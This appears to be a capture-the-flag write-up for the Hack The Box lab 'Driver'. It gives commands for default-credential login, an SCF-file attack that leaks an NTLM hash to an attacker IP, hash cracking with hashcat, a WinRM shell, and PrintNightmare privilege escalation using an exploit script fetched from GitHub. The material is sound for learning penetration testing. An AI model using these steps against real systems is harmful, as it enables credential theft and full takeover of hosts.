Driver

Enumeration

Nmap

First, let's scan for open ports using nmap. We can quickly scan for open ports and store them in a variable: ports=$(nmap -p- --min-rate=1000 -T4 10.10.11.106 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//). Then, we can scan those specific ports in depth by running nmap's built-in scripts: nmap -p$ports -sC -sV 10.10.11.106.

PORT     STATE SERVICE      VERSION
80/tcp   open  http         Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=MFP Firmware Update Center. Please enter password for admin
|_http-server-header: Microsoft-IIS/10.0
135/tcp  open  msrpc        Microsoft Windows RPC
445/tcp  open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-02-19T11:40:18
|_  start_date: 2022-02-19T05:20:32
|_clock-skew: mean: 7h00m02s, deviation: 0s, median: 7h00m02s

Port 80

Going to the website on port 80 gives an HTTP authentication dialogue box. Using the credentials admin:admin to sign in works. There is a fw_up.php page where we can upload firmware, but there doesn't seem to be an accessible location where those files get uploaded to.

A directory bruteforce scan reveals nothing: ffuf -w /usr/share/seclists/Discovery/Web-Content/big.txt -u http://10.10.11.106/FUZZ.

Port 5985 (WinRM)

According to HackTricks, "Windows Remote Management (WinRM) is a Microsoft protocol that allows remote management of Windows machines over HTTP(S) using SOAP... If WinRM is enabled on the machine, it's trivial to remotely administer the machine from PowerShell. In fact, you can just drop in to a remote PowerShell session on the machine (as if you were using SSH!)"

Under the WinRM connection in linux heading, HackTricks mentions using Hackplayers/evil-winrm. We need to have access credentials to use this protocol.

Port 135 (Samba)

This leaves one port, 135, which is for samba. According to Wikipedia, "Server Message Block (SMB) is a communication protocol that Microsoft created for providing shared access to files and printers across nodes on a network." Since the other two ports look like dead ends for now, we must be able to find something here. Maybe the files are being uploaded to the samba share, which would mean we have write access to that share without authentication details.

Under this assumption, searching online for "smb unauthenticated write access exploit" reveals this post about SCF file attacks on SMB. Apparently, if SMB "is configured with write permissions for unauthenticated users then it is possible to obtain passwords hashes of domain users or Meterpreter shells."

On the HackTricks post about WinRM there is a subheading called "Pass the hash with evil-winrm." So, if we can get a hash with an SCF attack we can pass the hash and get a user shell with evil-winrm.

Searching for "SMB SCF file exploit" shows these additional results: sql--injection.blogspot.com and 1337red.wordpress.com.

Essentially, an SCF file is used to control Windows Explorer. So, when a user browses to a folder containing an SCF file, Windows will use the contents of that file. We can create an SCF file like this:

We can set X.X.X.X to our attacker's ip address. Since the IconFile field is set to a UNC path, Windows will request the icon from the attacker and try authenticating with the user's credentials, then the attack will issue a challenge request, finally Windows will return a challenge response with the NTLM hash.

Foothold

First, we start responder with sudo responder -w --lm -v -I tun0.

Then, we upload the following SCF file using the firmware upload page (fw_up.php) on port 80.

Responder outputs the following:

We have our NTLM hash!

Cracking the NTLM Hash

We can crack this hash with hashcat. We first find the hashcat mode needed for NTLMv2 hashes with hashcat --help | grep NTLMv2, which shows us the correct mode is 5600.

So, we paste the hash into a file called hash and then run hashcat with hashcat -a 0 -m 5600 hash rockyou.txt:

The password is liltony.

Evil WinRM

According to HackTricks, we can use evil-winrm like so: evil-winrm -u <username> -p <password> -i <IP>. Let's connect with the tony user like so: evil-winrm -u tony -p liltony -i 10.10.11.106.

We get a shell on the machine! Now, we can get the user.txt flag with cat ..\Desktop\user.txt.

Privilege Escalation

Let's upload WinPEAS to scan for ways to gain privileges. Since we are using evil-winrm we can simply run the upload command: upload /home/kali/Downloads/winPEASx64.exe. We can run it with .\winPEASx64.exe. This doesn't give any easy wins.

To get a metasploit shell run the following on the attacker:

Then, through evil-winrm on the target run: upload e.exe and then .\e.exe.

Then, back in the meterpreter, run background to get mack the the msf console. Then run use post/multi/recon/local_exploit_suggester and set the session with set session 1 then run to get a list of possible exploits. This reveals nothing.

So, the actual exploit that should be used is CVE-2021-1675/CVE-2021-34527, or PrintNightmare. After enough searching one may find this exploit because the spoolsv service is running as shown in WinPEAS's "Current TCP Listening Ports" output (and when simply running ps):

0xdf's article "Playing with PrintNightmare" is a great tutorial on how to exploit this vulnerability. Invoke-Nightmare, a PowerShell script developed by Caleb Stewart and John Hammond, is the most simple to use PrintNightmare exploit.

We can download the exploit to our attacker machine with wget https://raw.githubusercontent.com/calebstewart/CVE-2021-1675/main/CVE-2021-1675.ps1 and then upload it to the target with our evil-winrm connection by running upload CVE-2021-1675.ps1. Then, run set-ExecutionPolicy RemoteSigned -Scope CurrentUser so you don't get the "execution of scripts is disabled on this system" error message (StackOverflow answer where command was found). Now, we can launch the exploit:

Originally, I saw the [!] failed to get current driver list error message, but after resetting the box it worked:

Now, all we have to do is connect with evil-winrm as our newly created administrator john user: evil-winrm -u john -p SuperSecure -i 10.10.11.106. We can get the root.txt flag with cat C:\Users\Administrator\Desktop\root.txt.